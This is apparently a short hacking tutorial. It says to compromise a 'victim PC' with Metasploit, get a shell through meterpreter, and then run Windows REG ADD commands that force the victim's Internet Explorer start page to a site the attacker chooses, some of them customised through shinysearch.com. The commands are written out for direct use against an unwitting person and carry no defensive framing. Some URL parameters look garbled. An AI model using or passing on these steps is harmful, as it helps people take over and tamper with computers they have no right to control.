First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)
Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target
Set Your Desired Website as Home Page
Type the following commands in the command prompt. (Enter the web address of the desired website; here we have taken an example of (http://www.hackingarticles.in/)
REG ADD “HKCU\Software\Microsoft\Internet Explorer\Main” /V “Start Page” /D “http://www.hackingarticles.in/” /F
Now, open the internet explorer in the remote victim PC, we would see that the chosen webpage will open as the homepage.
Stylish Home Page
(Use this link www.shinysearch.com to put your own desired text.)
REG ADD “HKCU\Software\Microsoft\Internet Explorer\Main” /V “Start Page” /D “http://www.shinysearch.com/myhome.php?theme=matrix<ext=www.hackingarticles.in” /F
Check out this screenshot seen after opening the internet explorer.
Insert Your Image in Google Background
Type the following command)
(Take the reference of the link http://www.hackingarticles.in/insert-image-google-search/ to put your own desired image in the background)
REG ADD “HKCU\Software\Microsoft\Internet Explorer\Main” /V “Start Page” /D “http://www.shinysearch.com/myhome.php?style=mypic_full&img=b26b7e0e353d82b7642905e68ca5476e<ext=Your%20Name” /F
Open the internet explorer; we would get the image in the Google search background.